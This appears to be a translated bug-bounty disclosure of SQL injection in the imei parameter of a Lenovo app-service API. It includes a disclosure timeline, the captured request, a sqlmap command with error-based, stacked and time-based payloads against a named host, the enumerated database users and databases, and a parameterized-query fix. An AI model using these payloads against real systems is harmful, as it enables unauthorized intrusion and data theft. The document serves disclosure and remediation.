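2015-02-21: Details reported to the vendor; awaiting vendor response
2015-02-22: Vendor confirmed; details disclosed to the vendor only
2015-02-25: Details opened to third-party security partners
2015-04-18: Details disclosed to core white hats and experts in related fields
2015-04-28: Details disclosed to regular white hats
2015-05-08: Details disclosed to intern white hats
2015-05-23: Details disclosed to the public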
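SQL injection vulnerability in the cloud API of a Lenovo app service
Download and install "乐服务" from Baidu Mobile Assistant.
Launch the app, and the following HTTP request can be observed: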
POST /Service2.asmx/GetHomePageData HTTP/1.1
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Host: app.lenovocare.com.cn
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

announceReadId=0&imei=000000000000000&model=Google&appVersionCode=2015021200&isCountByUmeng=1
Testing confirmed that the imei parameter is injectable.
sqlmap.py -r "e:/1.txt" --dbms=mssql --dbs --users --current-user
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: imei (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: announceReadId=0&imei=000000000000000' AND 4869=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4869=4869) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'oeHG'='oeHG&model=Google&appVersionCode=2015021200&isCountByUmeng=1

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: announceReadId=0&imei=000000000000000'; WAITFOR DELAY '0:0:5'--&model=Google&appVersionCode=2015021200&isCountByUmeng=1

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: announceReadId=0&imei=000000000000000' WAITFOR DELAY '0:0:5'--&model=Google&appVersionCode=2015021200&isCountByUmeng=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user: 'db_spadmin'
database management system users [10]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] db_moto
[*] db_sell
[*] db_spadmin
[*] db_ts
[*] imei_reader
[*] sa
[*] survey_reader
[*] tse2e!@#usr

available databases [10]:
[*] master
[*] model
[*] MotoService
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] ServiceSell
[*] spadmin
[*] tempdb
[*] ts
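The root cause implied by the output above, shown next to its fix, as an added example that is not part of the original report and is not the vendor's code. Assumptions: SQLite stands in for the SQL Server back end, the device table and all function names are hypothetical, and TAMPERED reuses only the quote-balancing tail of the reported payload.

```python
import re
import sqlite3

# Constructed value: the quote-balancing tail of the reported payload.
TAMPERED = "000000000000000' AND 'oeHG'='oeHG"

def is_valid_imei(imei: str) -> bool:
    """Exactly 15 ASCII digits with a correct Luhn check digit."""
    if not re.fullmatch(r"[0-9]{15}", imei):
        return False
    total = 0
    for pos, ch in enumerate(reversed(imei)):
        d = int(ch)
        if pos % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def make_db() -> sqlite3.Connection:
    """Hypothetical schema; SQLite stands in for the SQL Server back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE device (imei TEXT PRIMARY KEY, model TEXT)")
    db.execute("INSERT INTO device VALUES ('000000000000000', 'Google')")
    return db

def lookup_concat(db, imei):
    """Flawed pattern: the request value becomes part of the SQL text."""
    sql = "SELECT model FROM device WHERE imei = '" + imei + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, imei):
    """Bound parameter: the value is only ever compared as data."""
    sql = "SELECT model FROM device WHERE imei = ?"
    return [row[0] for row in db.execute(sql, (imei,))]

def handle_request(db, imei):
    """Validate first, then query with a bound parameter."""
    if not is_valid_imei(imei):
        raise ValueError("imei must be 15 digits with a valid check digit")
    return lookup_bound(db, imei)

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, TAMPERED))   # quote closed the literal; rest ran as SQL
    print(lookup_bound(db, TAMPERED))    # no row: the whole string is one value
    print(handle_request(db, "000000000000000"))
```

On SQL Server the same two layers apply: bind imei as a typed parameter, and run the service under an account with only the rights the query needs.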
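It's New Year, so give it at least 8 points, hehe ._ .
Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-02-22 12:00
Thank you for supporting Lenovo's security work; we will fix the vulnerability as soon as possible.
None yet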